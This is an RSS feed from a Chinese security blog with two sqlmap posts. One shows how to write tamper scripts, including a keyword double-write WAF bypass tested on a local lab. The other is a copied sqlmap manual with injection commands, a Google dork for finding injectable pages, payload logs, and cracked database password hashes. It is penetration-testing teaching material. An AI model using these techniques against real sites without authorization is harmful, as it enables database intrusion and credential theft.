<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>sqlmap &#8211; ChaBug安全</title>
	<atom:link href="/tags/sqlmap/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Mon, 18 Nov 2019 02:53:56 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>sqlmap tamper编写</title>
		<link>/web/1039.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Mon, 18 Nov 2019 02:53:56 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[sqlmap]]></category>
		<category><![CDATA[tamper]]></category>
		<guid isPermaLink="false">/?p=1039</guid>

					<description><![CDATA[简单介绍tamper sqlmap的--tamper参数可以引入用户自定义的脚本来修改注入时的payload，由此可以使用tamper来绕过waf，替换被过滤的关键字等。这是一个基...]]></description>
										<content:encoded><![CDATA[<h1>简单介绍<span class="wpcom_tag_link"><a href="/tags/tamper" title="tamper" target="_blank">tamper</a></span></h1>
<p><span class="wpcom_tag_link"><a href="/tags/sqlmap" title="sqlmap" target="_blank">sqlmap</a></span>的<code>--tamper</code>参数可以引入用户自定义的脚本来修改注入时的payload，由此可以使用tamper来绕过waf，替换被过滤的关键字等。这是一个基本的tamper结构</p>
<pre><code class="language-python ">#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW # 当前脚本调用优先等级

def dependencies(): # 声明当前脚本适用/不适用的范围，可以为空。
    pass

def tamper(payload, **kwargs): # 用于篡改Payload、以及请求头的主要函数
    return payload
</code></pre>
<p>需要把他保存为 <code>my.py</code> 放入 <code>sqlmaptamper</code> 路径下，然后使用的时候加上参数 <code>--tamper=my</code> 就行了</p>
<h1>简单分析</h1>
<p>拿官方的一个tamper来分析下结构</p>
<pre><code class="language-python ">#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload
</code></pre>
<p>分为了import部分、<code>__priority__</code> 属性、dependencies函数、tamper函数以及用户自定义的函数</p>
<h1>import</h1>
<p>这一部分我们可以导入sqlmap的内部库，sqlmap为我们提供了很多封装好的函数和数据类型，比如下文的<code>PRIORITY</code>就来源于<code>sqlmap/lib/core/enums.py</code></p>
<h2>PRIORITY</h2>
<p>PRIORITY是定义tamper的优先级，PRIORITY有以下几个参数:<br />
&#8211; LOWEST = -100<br />
&#8211; LOWER = -50<br />
&#8211; LOW = -10<br />
&#8211; NORMAL = 0<br />
&#8211; HIGH = 10<br />
&#8211; HIGHER = 50<br />
&#8211; HIGHEST = 100<br />
如果使用者使用了多个tamper，sqlmap就会根据每个tamper定义PRIORITY的参数等级来优先使用等级较高的tamper，如果你有两个tamper需要同时用，需要注意这个问题。</p>
<h1>dependencies</h1>
<p>dependencies主要是提示用户，这个tamper支持哪些数据库，具体代码如下:</p>
<pre><code class="">#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("这是我的tamper提示")

def tamper(payload, **kwargs):
    return payload
</code></pre>
<p><img src="https://user-images.githubusercontent.com/40487319/69019353-363aa900-09eb-11ea-83b2-c8c10fbeeedb.png" alt="image" /></p>
<p>DBMS.MYSQL这个参数代表的是Mysql，其他数据库的参数也可以看这个<code>sqlmaplibcoreenums.py</code></p>
<p><img src="/wp-content/uploads/2019/11/69019392-6d10bf00-09eb-11ea-83e4-169a2e13dbf0.png" alt="image" /></p>
<h1>Tamper</h1>
<p>tamper这个函数是tamper最重要的函数，你要实现的功能，全部写在这个函数里。payload这个参数就是sqlmap的原始注入payload，我们要实现绕过，一般就是针对这个payload的修改。kwargs是针对http头部的修改，如果你bypass，是通过修改http头，就需要用到这个</p>
<h2>基于payload</h2>
<p>先来基于修改payload来绕过替换关键字，我使用sqlilab的第一关，并且修改了部分代码来把恶意关键字替换为空来避免联合查询，如图</p>
<p><img src="/wp-content/uploads/2019/11/69020192-a7c82680-09ee-11ea-8c8d-00e09627f22c.png" alt="image" /></p>
<p>编写tamper来双写绕过</p>
<pre><code class="">def tamper(payload, **kwargs):
    payload = payload.lower()
    payload = payload.replace('select','seleselectct')
    payload = payload.replace('union','ununionion')
    return payload
</code></pre>
<p>没有使用tamper之前，我们加上<code>--tech=U</code>来让sqlmap只测试联合查询注入，<code>--flush-session</code>意思是每次刷新会话，清理上次的缓存。</p>
<pre><code class="">sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080/ --random-agent --dbms=mysql
</code></pre>
<p><img src="/wp-content/uploads/2019/11/69020183-a0088200-09ee-11ea-912e-01e970f087f6.png" alt="image" /></p>
<p>从burp的流量中看到payload是没有双写的，必然会注入失败。而使用了tamper之后</p>
<pre><code class="">sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080/ --random-agent --tamper=my --dbms=mysql
</code></pre>
<p><img src="/wp-content/uploads/2019/11/69020623-1954a480-09f0-11ea-9479-ba0190158a3e.png" alt="image" /></p>
<p>payload正常双写，可以注入</p>
<p><img src="/wp-content/uploads/2019/11/69020652-38533680-09f0-11ea-8974-9b23d6289a52.png" alt="image" /></p>
<h2>基于http头</h2>
<p>我们使用<code>sqlmaptamperxforwardedfor.py</code>的tamper来讲解</p>
<pre><code class="">def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload
</code></pre>
<p>从<code>kwargs</code>中取出<code>headers</code>数组，然后修改了xff值达到随机IP的效果，不再赘述。</p>
<h1>总结</h1>
<p>本文简单介绍了tamper的编写，并使用双写做了实例演示，在实际的渗透测试中，我们需要针对不同的waf来编写不同的tamper来灵活使用。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>sqlmap用户手册</title>
		<link>/tools/359.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 18 Feb 2018 21:13:00 +0000</pubDate>
				<category><![CDATA[工具分享]]></category>
		<category><![CDATA[sqlmap]]></category>
		<guid isPermaLink="false">/?p=229</guid>

					<description><![CDATA[抄自网络，版权乌云知识库。 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候，它会： ...]]></description>
										<content:encoded><![CDATA[<blockquote><p>抄自网络，版权乌云知识库。</p></blockquote>
<p><a href="http://192.168.136.131/sqlmap/mysql/get_int.php?id=1">http://192.168.136.131/sqlmap/mysql/get_int.php?id=1</a></p>
<p>当给<span class="wpcom_tag_link"><a href="/tags/sqlmap" title="sqlmap" target="_blank">sqlmap</a></span>这么一个url的时候，它会：</p>
<pre><code>1、判断可注入的参数
2、判断可以用那种SQL注入技术来注入
3、识别出哪种数据库
4、根据用户选择，读取哪些数据</code></pre>
<p>sqlmap支持五种不同的注入模式：</p>
<pre><code>1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注，即不能根据页面返回内容判断任何信息，用条件语句查看时间延迟语句是否执行（即页面返回时间是否增加）来判断。
3、基于报错注入，即页面会返回错误信息，或者把注入的语句的结果直接返回在页面中。
4、联合查询注入，可以使用union的情况下的注入。
5、堆查询注入，可以同时执行多条语句的执行时的注入。</code></pre>
<p>sqlmap支持的数据库有：</p>
<pre><code>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB</code></pre>
<p>可以提供一个简单的URL，Burp或WebScarab请求日志文件，文本文档中的完整http请求或者Google的搜索，匹配出结果页面，也可以自己定义一个正则来判断那个地址去测试。</p>
<p>测试GET参数，POST参数，HTTP Cookie参数，HTTP User-Agent头和HTTP Referer头来确认是否有SQL注入，它也可以指定用逗号分隔的列表的具体参数来测试。</p>
<p>可以设定HTTP(S)请求的并发数，来提高盲注时的效率。</p>
<p>Youtube上有人做的使用sqlmap的视频：</p>
<p><a href="http://www.youtube.com/user/inquisb/videos">http://www.youtube.com/user/inquisb/videos</a></p>
<p><a href="http://www.youtube.com/user/stamparm/videos">http://www.youtube.com/user/stamparm/videos</a></p>
<p>使用sqlmap的实例文章：</p>
<p><a href="http://unconciousmind.blogspot.com/search/label/sqlmap">http://unconciousmind.blogspot.com/search/label/sqlmap</a></p>
<p>可以点击<a href="https://github.com/sqlmapproject/sqlmap/tarball/master">https://github.com/sqlmapproject/sqlmap/tarball/master</a> 下载最新版本sqlmap。</p>
<p>也可以使用git来获取sqlmap</p>
<pre><code>git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
<p>之后可以直接使用命令来更新</p>
<pre><code>python sqlmap.py --update</code></pre>
<p>或者</p>
<pre><code>git pull</code></pre>
<p>更新sqlmap</p>
<p>如果你想观察sqlmap对一个点是进行了怎样的尝试判断以及读取数据的，可以使用-v参数。</p>
<p>共有七个等级，默认为1：</p>
<pre><code>0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。（默认）
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。</code></pre>
<p>如果你想看到sqlmap发送的测试payload最好的等级就是3。</p>
<h1>获取目标方式</h1>
<hr />
<h2>目标URL</h2>
<p>参数：-u或者&#8211;url</p>
<p>格式：<code>http(s)://targeturl[:port]/[…]</code></p>
<p>例如：<code>python sqlmap.py -u &quot;http://www.target.com/vuln.php?id=1&quot; -f --banner --dbs --users</code></p>
<h2>从Burp或者WebScarab代理中获取日志</h2>
<p>参数：-l</p>
<p>可以直接吧Burp proxy或者WebScarab proxy中的日志直接倒出来交给sqlmap来一个一个检测是否有注入。</p>
<h2>从文本中获取多个目标扫描</h2>
<p>参数：-m</p>
<p>文件中保存url格式如下，sqlmap会一个一个检测</p>
<pre><code>www.target1.com/vuln1.php?q=foobar
www.target2.com/vuln2.asp?id=1
www.target3.com/vuln3/id/1*</code></pre>
<h2>从文件中加载HTTP请求</h2>
<p>参数：-r</p>
<p>sqlmap可以从一个文本文件中获取HTTP请求，这样就可以跳过设置一些其他参数（比如cookie，POST数据，等等）。</p>
<p>比如文本文件内如下：</p>
<pre><code>POST /vuln.php HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/4.0
id=1</code></pre>
<p>当请求是HTTPS的时候你需要配合这个&#8211;force-ssl参数来使用，或者你可以在Host头后面加上:443</p>
<h2>处理Google的搜索结果</h2>
<p>参数：-g</p>
<p>sqlmap可以测试注入Google的搜索结果中的GET参数（只获取前100个结果）。</p>
<p>例子：</p>
<pre><code>python sqlmap.py -g &quot;inurl:\&quot;.php?id=1\&quot;&quot;</code></pre>
<p>此外可以使用-c参数加载sqlmap.conf文件里面的相关配置。</p>
<h1>请求</h1>
<hr />
<h2>http数据</h2>
<p>参数：&#8211;data</p>
<p>此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST的参数。</p>
<p>例子：</p>
<pre><code>python sqlmap.py -u &quot;http://www.target.com/vuln.php&quot; --data=&quot;id=1&quot; -f --banner --dbs --users</code></pre>
<h2>参数拆分字符</h2>
<p>参数：&#8211;param-del</p>
<p>当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。</p>
<p>例子：</p>
<pre><code>python sqlmap.py -u &quot;http://www.target.com/vuln.php&quot; --data=&quot;query=foobar;id=1&quot; --param-del=&quot;;&quot; -f --banner --dbs --users</code></pre>
<h2>HTTP cookie头</h2>
<p>参数：&#8211;cookie,&#8211;load-cookies,&#8211;drop-set-cookie</p>
<p>这个参数在以下两个方面很有用：</p>
<ol>
<li>web应用需要登陆的时候。</li>
<li>你想要在这些头参数中测试SQL注入时。</li>
</ol>
<p>可以通过抓包把cookie获取到，复制出来，然后加到&#8211;cookie参数里。</p>
<p>在HTTP请求中，遇到Set-Cookie的话，sqlmap会自动获取并且在以后的请求中加入，并且会尝试SQL注入。</p>
<p>如果你不想接受Set-Cookie可以使用&#8211;drop-set-cookie参数来拒接。</p>
<p>当你使用&#8211;cookie参数时，当返回一个Set-Cookie头的时候，sqlmap会询问你用哪个cookie来继续接下来的请求。当&#8211;level的参数设定为2或者2以上的时候，sqlmap会尝试注入Cookie参数。</p>
<h2>HTTP User-Agent头</h2>
<p>参数：&#8211;user-agent,&#8211;random-agent</p>
<p>默认情况下sqlmap的HTTP请求头中User-Agent值是：</p>
<pre><code>sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)/</code></pre>
<p>可以使用&#8211;user-anget参数来修改，同时也可以使用&#8211;random-agnet参数来随机的从./txt/user-agents.txt中获取。</p>
<p>当&#8211;level参数设定为3或者3以上的时候，会尝试对User-Angent进行注入。</p>
<h2>HTTP Referer头</h2>
<p>参数：&#8211;referer</p>
<p>sqlmap可以在请求中伪造HTTP中的referer，当&#8211;level参数设定为3或者3以上的时候会尝试对referer注入。</p>
<h2>额外的HTTP头</h2>
<p>参数：&#8211;headers</p>
<p>可以通过&#8211;headers参数来增加额外的http头</p>
<h2>HTTP认证保护</h2>
<p>参数：&#8211;auth-type,&#8211;auth-cred</p>
<p>这些参数可以用来登陆HTTP的认证保护支持三种方式：</p>
<ol>
<li>Basic</li>
<li>Digest</li>
<li>NTLM</li>
</ol>
<p>例子：</p>
<pre><code>python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1&quot; --auth-type Basic --auth-cred &quot;testuser:testpass&quot;</code></pre>
<h2>HTTP协议的证书认证</h2>
<p>参数：&#8211;auth-cert</p>
<p>当Web服务器需要客户端证书进行身份验证时，需要提供两个文件:key_file，cert_file。</p>
<p>key_file是格式为PEM文件，包含着你的私钥，cert_file是格式为PEM的连接文件。</p>
<h2>HTTP(S)代理</h2>
<p>参数：&#8211;proxy,&#8211;proxy-cred和&#8211;ignore-proxy</p>
<p>使用&#8211;proxy代理是格式为：<code></code>。</p>
<p>当HTTP(S)代理需要认证是可以使用&#8211;proxy-cred参数：username:password。</p>
<p>&#8211;ignore-proxy拒绝使用本地局域网的HTTP(S)代理。</p>
<h2>HTTP请求延迟</h2>
<p>参数：&#8211;delay</p>
<p>可以设定两个HTTP(S)请求间的延迟，设定为0.5的时候是半秒，默认是没有延迟的。</p>
<h2>设定超时时间</h2>
<p>参数：&#8211;timeout</p>
<p>可以设定一个HTTP(S)请求超过多久判定为超时，10.5表示10.5秒，默认是30秒。</p>
<h2>设定重试超时</h2>
<p>参数：&#8211;retries</p>
<p>当HTTP(S)超时时，可以设定重新尝试连接次数，默认是3次。</p>
<h2>设定随机改变的参数值</h2>
<p>参数：&#8211;randomize</p>
<p>可以设定某一个参数值在每一次请求中随机的变化，长度和类型会与提供的初始值一样。</p>
<h2>利用正则过滤目标网址</h2>
<p>参数：&#8211;scope</p>
<p>例如：</p>
<pre><code>python sqlmap.py -l burp.log --scope=&quot;(www)?\.target\.(com|net|org)&quot;</code></pre>
<h2>避免过多的错误请求被屏蔽</h2>
<p>参数：&#8211;safe-url,&#8211;safe-freq</p>
<p>有的web应用程序会在你多次访问错误的请求时屏蔽掉你以后的所有请求，这样在sqlmap进行探测或者注入的时候可能造成错误请求而触发这个策略，导致以后无法进行。</p>
<p>绕过这个策略有两种方式：</p>
<pre><code>1. --safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。
2. --safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。</code></pre>
<h2>关掉URL参数值编码</h2>
<p>参数：&#8211;skip-urlencode</p>
<p>根据参数位置，他的值默认将会被URL编码，但是有些时候后端的web服务器不遵守RFC标准，只接受不经过URL编码的值，这时候就需要用&#8211;skip-urlencode参数。</p>
<h2>每次请求时候执行自定义的python代码</h2>
<p>参数：&#8211;eval</p>
<p>在有些时候，需要根据某个参数的变化，而修改另个一参数，才能形成正常的请求，这时可以用&#8211;eval参数在每次请求时根据所写python代码做完修改后请求。</p>
<p>例子：</p>
<pre><code>python sqlmap.py -u &quot;http://www.target.com/vuln.php?id=1&amp;hash=c4ca4238a0b923820dcc509a6f75849b&quot; --eval=&quot;import hashlib;hash=hashlib.md5(id).hexdigest()&quot;</code></pre>
<p>上面的请求就是每次请求时根据id参数值，做一次md5后作为hash参数的值。</p>
<h1>注入</h1>
<hr />
<h2>测试参数</h2>
<p>参数：-p,&#8211;skip</p>
<p>sqlmap默认测试所有的GET和POST参数，当&#8211;level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p参数设置想要测试的参数。例如： -p &#8220;id,user-anget&#8221;</p>
<p>当你使用&#8211;level的值很大但是有个别参数不想测试的时候可以使用&#8211;skip参数。</p>
<p>例如：&#8211;skip=&#8221;user-angent.referer&#8221;</p>
<p>在有些时候web服务器使用了URL重写，导致无法直接使用sqlmap测试参数，可以在想测试的参数后面加*</p>
<p>例如：</p>
<pre><code>python sqlmap.py -u &quot;http://targeturl/param1/value1*/param2/value2/&quot;</code></pre>
<p>sqlmap将会测试value1的位置是否可注入。</p>
<h2>指定数据库</h2>
<p>参数：&#8211;dbms</p>
<p>默认情况系sqlmap会自动的探测web应用后端的数据库是什么，sqlmap支持的数据库有：</p>
<pre><code>MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAP MaxDB、DB2</code></pre>
<h2>指定数据库服务器系统</h2>
<p>参数：&#8211;os</p>
<p>默认情况下sqlmap会自动的探测数据库服务器系统，支持的系统有：Linux、Windows。</p>
<h2>指定无效的大数字</h2>
<p>参数：&#8211;invalid-bignum</p>
<p>当你想指定一个报错的数值时，可以使用这个参数，例如默认情况系id=13，sqlmap会变成id=-13来报错，你可以指定比如id=9999999来报错。</p>
<h2>只定无效的逻辑</h2>
<p>参数：&#8211;invalid-logical</p>
<p>原因同上，可以指定id=13把原来的id=-13的报错改成id=13 AND 18=19。</p>
<h2>注入payload</h2>
<p>参数：&#8211;prefix,&#8211;suffix</p>
<p>在有些环境中，需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。</p>
<p>例如，代码中是这样调用数据库的：</p>
<pre><code>$query = &quot;SELECT * FROM users WHERE id=(’&quot; . $_GET[’id’] . &quot;’) LIMIT 0, 1&quot;;</code></pre>
<p>这时你就需要&#8211;prefix和&#8211;suffix参数了：</p>
<pre><code>python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1&quot; -p id --prefix &quot;’)&quot; --suffix &quot;AND (’abc’=’abc&quot;</code></pre>
<p>这样执行的SQL语句变成：</p>
<pre><code>$query = &quot;SELECT * FROM users WHERE id=(’1’)  AND (’abc’=’abc’) LIMIT 0, 1&quot;;</code></pre>
<h2>修改注入的数据</h2>
<p>参数：&#8211;tamper</p>
<p>sqlmap除了使用CHAR()函数来防止出现单引号之外没有对注入的数据修改，你可以使用&#8211;tamper参数对数据做修改来绕过WAF等设备。</p>
<p>下面是一个tamper脚本的格式：</p>
<pre><code># Needed imports
from lib.core.enums import PRIORITY
# Define which is the order of application of tamper scripts against
# the payload
__priority__ = PRIORITY.NORMAL
def tamper(payload):
'''
Description of your tamper script
'''
retVal = payload
# your code to tamper the original payload
# return the tampered payload
return retVal</code></pre>
<p>可以查看 tamper/ 目录下的有哪些可用的脚本</p>
<p>例如：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/mysql/get_int.php?id=1&quot; --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
[hh:mm:03] [DEBUG] cleaning up configuration parameters
[hh:mm:03] [INFO] loading tamper script 'between'
[hh:mm:03] [INFO] loading tamper script 'randomcase'
[hh:mm:03] [INFO] loading tamper script 'space2comment'
[...]
[hh:mm:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1)/**/And/**/1369=7706/**/And/**/(4092=4092
[hh:mm:04] [PAYLOAD] 1)/**/AND/**/9267=9267/**/AND/**/(4057=4057
[hh:mm:04] [PAYLOAD] 1/**/AnD/**/950=7041
[...]
[hh:mm:04] [INFO] testing 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause'
[hh:mm:04] [PAYLOAD] 1/**/anD/**/(SELeCt/**/9921/**/fROm(SELeCt/**/counT(*),CONCAT(cHar(
58,117,113,107,58),(SELeCt/**/(case/**/whEN/**/(9921=9921)/**/THeN/**/1/**/elsE/**/0/**/
ENd)),cHar(58,106,104,104,58),FLOOR(RanD(0)*2))x/**/fROm/**/information_schema.tables/**/
group/**/bY/**/x)a)
[hh:mm:04] [INFO] GET parameter 'id' is 'MySQL &gt;= 5.0 AND error-based - WHERE or HAVING
clause' injectable
[...]</code></pre>
<h1>探测</h1>
<hr />
<h2>探测等级</h2>
<p>参数：&#8211;level</p>
<p>共有五个等级，默认为1，sqlmap使用的payload可以在xml/payloads.xml中看到，你也可以根据相应的格式添加自己的payload。</p>
<p>这个参数不仅影响使用哪些payload同时也会影响测试的注入点，GET和POST的数据都会测试，HTTP Cookie在level为2的时候就会测试，HTTP User-Agent/Referer头在level为3的时候就会测试。</p>
<p>总之在你不确定哪个payload或者参数为注入点的时候，为了保证全面性，建议使用高的level值。</p>
<h2>风险等级</h2>
<p>参数：&#8211;risk</p>
<p>共有四个风险等级，默认是1会测试大部分的测试语句，2会增加基于事件的测试语句，3会增加OR语句的SQL注入测试。</p>
<p>在有些时候，例如在UPDATE的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险。</p>
<p>测试的语句同样可以在xml/payloads.xml中找到，你也可以自行添加payload。</p>
<h2>页面比较</h2>
<p>参数：&#8211;string,&#8211;not-string,&#8211;regexp,&#8211;code</p>
<p>默认情况下sqlmap通过判断返回页面的不同来判断真假，但有时候这会产生误差，因为有的页面在每次刷新的时候都会返回不同的代码，比如页面当中包含一个动态的广告或者其他内容，这会导致sqlmap的误判。此时用户可以提供一个字符串或者一段正则匹配，在原始页面与真条件下的页面都存在的字符串，而错误页面中不存在（使用&#8211;string参数添加字符串，&#8211;regexp添加正则），同时用户可以提供一段字符串在原始页面与真条件下的页面都不存在的字符串，而错误页面中存在的字符串（&#8211;not-string添加）。用户也可以提供真与假条件返回的HTTP状态码不一样来注入，例如，响应200的时候为真，响应401的时候为假，可以添加参数&#8211;code=200。</p>
<p>参数：&#8211;text-only,&#8211;titles</p>
<p>有些时候用户知道真条件下的返回页面与假条件下返回页面是不同位置在哪里可以使用&#8211;text-only（HTTP响应体中不同）&#8211;titles（HTML的title标签中不同）。</p>
<h1>注入技术</h1>
<hr />
<h2>测试是否是注入</h2>
<p>参数：&#8211;technique</p>
<p>这个参数可以指定sqlmap使用的探测技术，默认情况下会测试所有的方式。</p>
<p>支持的探测方式如下：</p>
<pre><code>B: Boolean-based blind SQL injection（布尔型注入）
E: Error-based SQL injection（报错型注入）
U: UNION query SQL injection（可联合查询注入）
S: Stacked queries SQL injection（可多语句查询注入）
T: Time-based blind SQL injection（基于时间延迟注入）</code></pre>
<h2>设定延迟注入的时间</h2>
<p>参数：&#8211;time-sec</p>
<p>当使用继续时间的盲注时，时刻使用&#8211;time-sec参数设定延时时间，默认是5秒。</p>
<h2>设定UNION查询字段数</h2>
<p>参数：&#8211;union-cols</p>
<p>默认情况下sqlmap测试UNION查询注入会测试1-10个字段数，当&#8211;level为5的时候他会增加测试到50个字段数。设定&#8211;union-cols的值应该是一段整数，如：12-16，是测试12-16个字段数。</p>
<h2>设定UNION查询使用的字符</h2>
<p>参数：&#8211;union-char</p>
<p>默认情况下sqlmap针对UNION查询的注入会使用NULL字符，但是有些情况下会造成页面返回失败，而一个随机整数是成功的，这是你可以用&#8211;union-char只定UNION查询的字符。</p>
<h2>二阶SQL注入</h2>
<p>参数：&#8211;second-order</p>
<p>有些时候注入点输入的数据看返回结果的时候并不是当前的页面，而是另外的一个页面，这时候就需要你指定到哪个页面获取响应判断真假。&#8211;second-order后面跟一个判断页面的URL地址。</p>
<h1>列数据</h1>
<hr />
<h2>标志</h2>
<p>参数：-b,&#8211;banner</p>
<p>大多数的数据库系统都有一个函数可以返回数据库的版本号，通常这个函数是version()或者变量@@version这主要取决与是什么数据库。</p>
<h2>用户</h2>
<p>参数：-current-user</p>
<p>在大多数据库中可以获取到管理数据的用户。</p>
<h2>当前数据库</h2>
<p>参数：&#8211;current-db</p>
<p>返还当前连接的数据库。</p>
<h2>当前用户是否为管理用</h2>
<p>参数：&#8211;is-dba</p>
<p>判断当前的用户是否为管理，是的话会返回True。</p>
<h2>列数据库管理用户</h2>
<p>参数：&#8211;users</p>
<p>当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户。</p>
<h2>列出并破解数据库用户的hash</h2>
<p>参数：&#8211;passwords</p>
<p>当前用户有权限读取包含用户密码的彪的权限时，sqlmap会现列举出用户，然后列出hash，并尝试破解。</p>
<p>例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1&quot; --passwords -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
password hash: md5d7d880f96044b72d0bba108ace96d1e4
clear-text password: testpass
[*] testuser [1]:
password hash: md599e5ea7a6f7c3269995cba3927fd0093
clear-text password: testpass</code></pre>
<p>可以看到sqlmap不仅勒出数据库的用户跟密码，同时也识别出是PostgreSQL数据库，并询问用户是否采用字典爆破的方式进行破解，这个爆破已经支持Oracle和Microsoft SQL Server。</p>
<p>也可以提供-U参数来指定爆破哪个用户的hash。</p>
<h2>列出数据库管理员权限</h2>
<p>参数：&#8211;privileges</p>
<p>当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的权限，sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看哪个用户的权限。</p>
<h2>列出数据库管理员角色</h2>
<p>参数：&#8211;roles</p>
<p>当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的角色，也可以用-U参数指定你想看哪个用户的角色。</p>
<p>仅适用于当前数据库是Oracle的时候。</p>
<h2>列出数据库系统的数据库</h2>
<p>参数：&#8211;dbs</p>
<p>当前用户有权限读取包含所有数据库列表信息的表中的时候，即可列出所有的数据库。</p>
<h2>列举数据库表</h2>
<p>参数：&#8211;tables,&#8211;exclude-sysdbs,-D</p>
<p>当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出一个特定数据的所有表。</p>
<p>如果你不提供-D参数来列指定的一个数据的时候，sqlmap会列出数据库所有库的所有表。</p>
<p>&#8211;exclude-sysdbs参数是指包含了所有的系统数据库。</p>
<p>需要注意的是在Oracle中你需要提供的是TABLESPACE_NAME而不是数据库名称。</p>
<h2>列举数据库表中的字段</h2>
<p>参数：&#8211;columns,-C,-T,-D</p>
<p>当前用户有权限读取包含所有数据库表信息的表中的时候，即可列出指定数据库表中的字段，同时也会列出字段的数据类型。</p>
<p>如果没有使用-D参数指定数据库时，默认会使用当前数据库。</p>
<p>列举一个SQLite的例子：</p>
<pre><code>$ python sqlmap.py -u &quot;http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1&quot; --columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| id | INTEGER |
| name | TEXT |
| surname | TEXT |
+---------+---------+</code></pre>
<h2>列举数据库系统的架构</h2>
<p>参数：&#8211;schema,&#8211;exclude-sysdbs</p>
<p>用户可以用此参数获取数据库的架构，包含所有的数据库，表和字段，以及各自的类型。</p>
<p>加上&#8211;exclude-sysdbs参数，将不会获取数据库自带的系统库内容。</p>
<p>MySQL例子：</p>
